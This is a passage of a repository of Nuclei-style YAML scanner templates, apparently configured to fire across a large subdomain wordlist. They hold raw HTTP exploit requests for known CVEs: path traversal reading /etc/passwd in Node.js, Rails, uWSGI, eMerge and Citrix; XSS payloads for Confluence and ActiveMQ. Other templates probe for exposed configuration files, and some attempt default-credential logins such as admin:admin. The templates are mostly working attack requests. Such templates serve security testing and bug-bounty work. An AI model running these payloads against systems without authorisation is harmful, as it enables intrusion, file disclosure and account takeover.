6 | reference: https://hackerone.com/reports/309124
7 | tags: cve,cve2018,nodejs,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /node_modules/../../../../../etc/passwd HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: regex
25 | regex:
26 | - "root:[x*]:0:0:"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-3760.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-3760
2 |
3 | info:
4 | name: Rails CVE-2018-3760
5 | author: 0xrudra
6 | severity: high
7 | tags: cve,cve2018,rails,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: regex
25 | regex:
26 | - "root:[x*]:0:0:"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-5230.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-5230
2 |
3 | info:
4 | name: Atlassian Confluence Status-List XSS
5 | author: madrobot
6 | severity: medium
7 | tags: cve,cve2018,atlassian,confluence,xss
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: word
25 | words:
26 | - "SRC=\"javascript:alert(1337)\">"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-7251.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-7251
2 |
3 | info:
4 | name: AnchorCMS Error Log Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: cve,cve2018,anchorcms,logs
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /anchor/errors.log HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - '"date":'
23 | - '"message":'
24 | - '"trace":['
25 | condition: and
26 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-7490.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-7490
2 |
3 | info:
4 | name: uWSGI PHP Plugin Directory Traversal
5 | author: madrobot
6 | severity: high
7 | tags: cve,cve2018,uwsgi,php,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: regex
25 | regex:
26 | - "root:[x*]:0:0:"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-8006.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-8006
2 |
3 | info:
4 | name: Apache ActiveMQ XSS
5 | author: pdteam
6 | severity: medium
7 | tags: cve,cve2018,apache,activemq,xss
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - '">'
24 | - type: word
25 | words:
26 | - "/html"
27 | part: header
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2019-19781.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2019-19781
2 |
3 | info:
4 | name: Citrix ADC Directory Traversal
5 | author: organiccrap
6 | severity: high
7 | description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
8 | reference: https://support.citrix.com/article/CTX267027
9 | tags: cve,cve2019,citrix,lfi
10 |
11 | requests:
12 | - payloads:
13 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
14 | attack: sniper
15 | threads: 100
16 |
17 | raw:
18 | - |
19 | GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
20 | Host: {{Subdomains}}
21 | matchers:
22 | - type: word
23 | words:
24 | - "[global]"
25 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2019-7254-1.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2019-7254 1
2 |
3 | info:
4 | name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
5 | author: 0x_Akoko
6 | severity: high
7 | reference: https://www.exploit-db.com/exploits/47616
8 | tags: emerge,lfi
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /?c=../../../../../../etc/passwd%00 HTTP/1.1
19 | Host: {{Subdomains}}
20 |
21 | matchers-condition: and
22 | matchers:
23 |
24 | - type: regex
25 | regex:
26 | - "root:[x*]:0:0"
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2019-7254-2.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2019-7254 2
2 |
3 | info:
4 | name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
5 | author: 0x_Akoko
6 | severity: high
7 | reference: https://www.exploit-db.com/exploits/47616
8 | tags: emerge,lfi
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 |
23 | - type: regex
24 | regex:
25 | - "root:[x*]:0:0"
26 |
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2020-13927.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2020-13927
2 |
3 | info:
4 | name: Unauthenticated Airflow Experimental REST API
5 | author: pdteam
6 | severity: medium
7 | tags: cve,cve2020,apache,airflow,unauth
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /api/experimental/latest_runs HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - '"dag_run_url":'
23 | - '"dag_id":'
24 | - '"items":'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/airflow-configuration-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: airflow-configuration-exposure
2 |
3 | info:
4 | name: Apache Airflow Configuration Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: exposure,config,airflow,apache
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /airflow.cfg HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - '[core]'
24 | - '[api]'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/amazon-docker-config-disclosure.yaml:
--------------------------------------------------------------------------------
1 | id: amazon-docker-config-disclosure
2 |
3 | info:
4 | name: Dockerrun AWS Configuration Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure,aws,devops
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /Dockerrun.aws.json HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'AWSEBDockerrunVersion'
24 | - 'containerDefinitions'
25 | condition: and
26 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/ansible-config-disclosure.yaml:
--------------------------------------------------------------------------------
1 | id: ansible-config-disclosure
2 |
3 | info:
4 | name: Ansible Configuration Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /ansible.cfg HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - '[defaults]'
24 | - '[inventory]'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/drupal-install.yaml:
--------------------------------------------------------------------------------
1 | id: drupal-install
2 |
3 | info:
4 | name: Drupal Install
5 | author: NkxxkN
6 | severity: low
7 | tags: exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /install.php?profile=default HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "Choose language | Drupal"
26 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/elmah-log-file.yaml:
--------------------------------------------------------------------------------
1 | id: elmah-log-file
2 |
3 | info:
4 | name: elmah.axd Disclosure
5 | author: shine
6 | severity: medium
7 | tags: logs,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /elmah.axd HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 |
25 | - type: word
26 | words:
27 | - 'Error Log for'
28 |
29 | - type: status
30 | status:
31 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/exposed-hg.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-hg
2 |
3 | info:
4 | name: Exposed HG Directory
5 | author: daffainfo
6 | severity: low
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /.hg/hgrc HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "[paths]"
25 | - "default"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/exposed-vscode.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-vscode
2 |
3 | info:
4 | name: Exposed VSCode Folders
5 | author: aashiq
6 | severity: low
7 | description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
8 | tags: vscode,exposure
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /.vscode/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - "Index of /.vscode"
25 | part: body
--------------------------------------------------------------------------------
/Templates/Configuration-Files/httpd-config.yaml:
--------------------------------------------------------------------------------
1 | id: httpd-config
2 |
3 | info:
4 | name: Httpd Config file disclosure
5 | author: sheikhrishad
6 | severity: info
7 | tags: config,exposure,httpd
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /httpd.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "LoadModule"
25 | - "# LoadModule"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/lazy-file.yaml:
--------------------------------------------------------------------------------
1 | id: lazy-file-manager
2 |
3 | info:
4 | name: Lazy File Manager
5 | author: amsda
6 | severity: medium
7 | tags: exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /lfm.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: status
25 | status:
26 | - 200
27 |
28 | - type: word
29 | words:
30 | - Lazy File Manager
--------------------------------------------------------------------------------
/Templates/Configuration-Files/nagios-status-page-1.yaml:
--------------------------------------------------------------------------------
1 | id: nagios-status-page 1
2 |
3 | info:
4 | name: Nagios Current Status Page
5 | author: dhiyaneshDk
6 | severity: low
7 | tags: exposure,nagios
8 | reference: https://www.exploit-db.com/ghdb/6918
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /nagios/cgi-bin/status.cgi HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - Current Network Status
25 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/nagios-status-page-2.yaml:
--------------------------------------------------------------------------------
1 | id: nagios-status-page
2 |
3 | info:
4 | name: Nagios Current Status Page
5 | author: dhiyaneshDk
6 | severity: low
7 | tags: exposure,nagios
8 | reference: https://www.exploit-db.com/ghdb/6918
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /cgi-bin/nagios4/status.cgi HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - Current Network Status
25 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/nagios-status-page-3.yaml:
--------------------------------------------------------------------------------
1 | id: nagios-status-page
2 |
3 | info:
4 | name: Nagios Current Status Page
5 | author: dhiyaneshDk
6 | severity: low
7 | tags: exposure,nagios
8 | reference: https://www.exploit-db.com/ghdb/6918
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /cgi-bin/nagios3/status.cgi HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - Current Network Status
25 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/opcache-status-exposure-1.yaml:
--------------------------------------------------------------------------------
1 | id: opcache-status-exposure 1
2 |
3 | info:
4 | name: OPcache Status Exposure
5 | author: pdteam
6 | severity: low
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /opcache-status/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "| opcache_enabled | "
24 | - "opcache_hit_rate | "
25 | condition: and
26 | part: body
--------------------------------------------------------------------------------
/Templates/Configuration-Files/opcache-status-exposure-2.yaml:
--------------------------------------------------------------------------------
1 | id: opcache-status-exposure 2
2 |
3 | info:
4 | name: OPcache Status Exposure
5 | author: pdteam
6 | severity: low
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /php-opcache-status/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "opcache_enabled | "
24 | - "opcache_hit_rate | "
25 | condition: and
26 | part: body
--------------------------------------------------------------------------------
/Templates/Configuration-Files/opcache-status-exposure-3.yaml:
--------------------------------------------------------------------------------
1 | id: opcache-status-exposure 3
2 |
3 | info:
4 | name: OPcache Status Exposure
5 | author: pdteam
6 | severity: low
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /opcache-status/opcache.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "opcache_enabled | "
24 | - "opcache_hit_rate | "
25 | condition: and
26 | part: body
--------------------------------------------------------------------------------
/Templates/Configuration-Files/perl-status.yaml:
--------------------------------------------------------------------------------
1 | id: perl-status
2 |
3 | info:
4 | name: Apache mod_perl Status Page Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /perl-status HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Apache2::Status"
24 | - "Perl version"
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/proftpd-config.yaml:
--------------------------------------------------------------------------------
1 | id: proftpd-config
2 |
3 | info:
4 | name: ProFTPD Config file disclosure
5 | author: sheikhrishad
6 | severity: low
7 | tags: config,exposure,proftpd
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /proftpd.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "ProFTPD"
25 | - "ServerName"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/samba-config.yaml:
--------------------------------------------------------------------------------
1 | id: samba-config
2 |
3 | info:
4 | name: Samba config file disclosure
5 | author: sheikhrishad
6 | severity: info
7 | tags: config,exposure,smb
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /smb.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "configuration file"
25 | - "samba"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/struts-debug-mode.yaml:
--------------------------------------------------------------------------------
1 | id: struts-debug-mode
2 |
3 | info:
4 | name: Apache Struts setup in Debug-Mode
5 | author: pdteam
6 | severity: low
7 | tags: logs,struts,apache,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "<debug>"
26 | - "<struts.actionMapping>"
27 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/svnserve-config.yaml:
--------------------------------------------------------------------------------
1 | id: svnserve-config
2 |
3 | info:
4 | name: svnserve config file disclosure
5 | author: sheikhrishad
6 | severity: low
7 | tags: config,exposure,svnserve
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /svnserve.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "This file controls the configuration of the svnserve daemon"
25 |
26 | - type: status
27 | status:
28 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/symfony-profiler.yaml:
--------------------------------------------------------------------------------
1 | id: symfony-profiler
2 |
3 | info:
4 | name: Symfony Profiler
5 | author: pdteam
6 | severity: high
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /_profiler/empty/search/results?limit=10 HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "<title>Symfony Profiler"
24 | - "symfony/profiler/"
25 | condition: and
26 | part: body
--------------------------------------------------------------------------------
/Templates/Configuration-Files/web-config.yaml:
--------------------------------------------------------------------------------
1 | id: web-config
2 | info:
3 | name: Web Config file
4 | author: Yash Anand @yashanand155
5 | severity: info
6 | tags: config,exposure
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /web.config HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | -
24 | -
25 | condition: and
26 |
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/xprober-service.yaml:
--------------------------------------------------------------------------------
1 | id: xprober-service
2 |
3 | info:
4 | name: X Prober server information leakage
5 | author: pdteam
6 | severity: low
7 | tags: config,exposure
8 | reference: https://twitter.com/bugbounty_tips/status/1339984643517423616
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /xprober.php HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - '"appName":"X Prober"'
25 | - 'X Prober'
26 | condition: and
--------------------------------------------------------------------------------
/Templates/Default-Login/activemq-default-login.yaml:
--------------------------------------------------------------------------------
1 | id: activemq-default-login
2 |
3 | info:
4 | name: Apache ActiveMQ Default Credentials
5 | author: pdteam
6 | severity: medium
7 | tags: apache,activemq,default-login
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | Authorization: Basic YWRtaW46YWRtaW4=
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Welcome to the Apache ActiveMQ Console of <b>'
24 | - '<h2>Broker</h2>'
25 | condition: and
26 |
--------------------------------------------------------------------------------
/Templates/Default-Login/ambari-default-credentials.yaml:
--------------------------------------------------------------------------------
1 | id: ambari-default-credentials
2 |
3 | info:
4 | name: Apache Ambari Default Credentials
5 | author: pdteam
6 | severity: medium
7 | tags: ambari,default-login
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
18 | Host: {{Subdomains}}
19 | Authorization: Basic YWRtaW46YWRtaW4=
20 | matchers:
21 | - type: word
22 | words:
23 | - '"Users" : {'
24 | - 'AMBARI.'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Default-Login/druid-default-password-1.yaml:
--------------------------------------------------------------------------------
1 | id: druid-default-password 1
2 |
3 | info:
4 | name: Druid Default Password
5 | author: pikpikcu
6 | severity: high
7 | tags: druid,default-login
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | POST /druid/submitLogin HTTP/1.1
18 | Host: {{Subdomains}}
19 | Content-Type: application/x-www-form-urlencoded
20 |
21 | loginUsername=admin&loginPassword=admin
22 | matchers-condition: and
23 | matchers:
24 |
25 | - type: status
26 | status:
27 | - 200
28 |
29 | - type: regex
30 | regex:
31 | - "^success$"
--------------------------------------------------------------------------------
/Templates/Default-Login/druid-default-password-2.yaml:
--------------------------------------------------------------------------------
1 | id: druid-default-password 2
2 |
3 | info:
4 | name: Druid Default Password
5 | author: pikpikcu
6 | severity: high
7 | tags: druid,default-login
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | POST /submitLogin HTTP/1.1
18 | Host: {{Subdomains}}
19 | Content-Type: application/x-www-form-urlencoded
20 |
21 | loginUsername=admin&loginPassword=admin
22 | matchers-condition: and
23 | matchers:
24 |
25 | - type: status
26 | status:
27 | - 200
28 |
29 | - type: regex
30 | regex:
31 | - "^success$"
--------------------------------------------------------------------------------
/Templates/Default-Login/ofbiz-default-credentials.yaml:
--------------------------------------------------------------------------------
1 | id: ofbiz-default-credentials
2 |
3 | info:
4 | name: Apache OfBiz Default Credentials
5 | author: pdteam
6 | severity: medium
7 | tags: ofbiz,default-login
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | POST /control/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | Content-Type: application/x-www-form-urlencoded
20 |
21 | USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
22 | matchers:
23 | - type: word
24 | words:
25 | - "ofbiz-pagination-template"
26 | - "<span>Powered by OFBiz</span>"
27 | condition: and
--------------------------------------------------------------------------------
/Templates/Default-Login/ofbiz-default-login.yaml:
--------------------------------------------------------------------------------
1 | id: ofbiz-default-login
2 |
3 | info:
4 | name: Apache OfBiz Default Login
5 | author: pdteam
6 | severity: medium
7 | tags: ofbiz,default-login
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
